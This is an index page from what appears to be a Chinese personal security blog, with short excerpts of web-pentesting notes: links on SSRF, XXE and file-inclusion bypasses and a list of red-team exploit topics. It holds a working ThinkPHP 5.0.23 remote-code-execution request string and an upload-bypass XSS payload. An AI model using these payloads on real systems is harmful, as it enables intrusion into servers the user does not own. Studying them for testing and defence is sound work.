上一页 1 ··· 5 6 7 8 9 10 11 12 13 ··· 23 下一页
2020年7月14日
ubuntu安装netcat
摘要: https://www.jianshu.com/p/91dd4ab317c7 阅读全文
posted @ 2020-07-14 10:09 vcxvxcv 阅读(1513) 评论(0) 推荐(0)
2020年7月13日
护网工作
摘要: https://www.bilibili.com/video/BV18p4y1S7Ej 内容: 发现->利用->防御 thinkphp RCE fastjson反序列化 tomcat -ajp 文件读取包含 (端口关掉) shiro反序列化 阅读全文
posted @ 2020-07-13 21:47 vcxvxcv 阅读(160) 评论(0) 推荐(0)
2020年7月9日
ssrf绕过
摘要: https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b 阅读全文
posted @ 2020-07-09 10:45 vcxvxcv 阅读(125) 评论(0) 推荐(0)
2020年7月8日
有意思的越权
摘要: 阅读全文
posted @ 2020-07-08 08:29 vcxvxcv 阅读(116) 评论(0) 推荐(0)
2020年7月7日
文件包含绕过
摘要: https://www.jianshu.com/p/9a7148a753e0 阅读全文
posted @ 2020-07-07 17:34 vcxvxcv 阅读(301) 评论(0) 推荐(0)
thinkphp5.0.23
摘要: /index.php?s=captcha post: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id 阅读全文
posted @ 2020-07-07 16:10 vcxvxcv 阅读(124) 评论(0) 推荐(0)
xxe
摘要: Content-Type: application/xml https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/ 阅读全文
posted @ 2020-07-07 09:40 vcxvxcv 阅读(127) 评论(0) 推荐(0)
2020年7月6日
文件上传
摘要: 超文本标记语言文本 .html,.html text/html 普通文本 .txt text/plain RTF文本 .rtf application/rtf GIF图形 .gif image/gif JPEG图形 .jpeg,.jpg image/jpeg au声音文件 .au audio/bas 阅读全文
posted @ 2020-07-06 14:35 vcxvxcv 阅读(114) 评论(0) 推荐(0)
文件上传html xss
摘要: How bypass it? - Change filename [1.jpg] to [1.html]. - Change Content-Type [image/jpeg] to [plain/html]. - Payload: <script>alert(1)</script> 阅读全文
posted @ 2020-07-06 07:45 vcxvxcv 阅读(352) 评论(0) 推荐(0)
2020年7月4日
获取网站title
摘要: http://www.link114.cn/title/ 阅读全文
posted @ 2020-07-04 18:23 vcxvxcv 阅读(272) 评论(0) 推荐(0)
上一页 1 ··· 5 6 7 8 9 10 11 12 13 ··· 23 下一页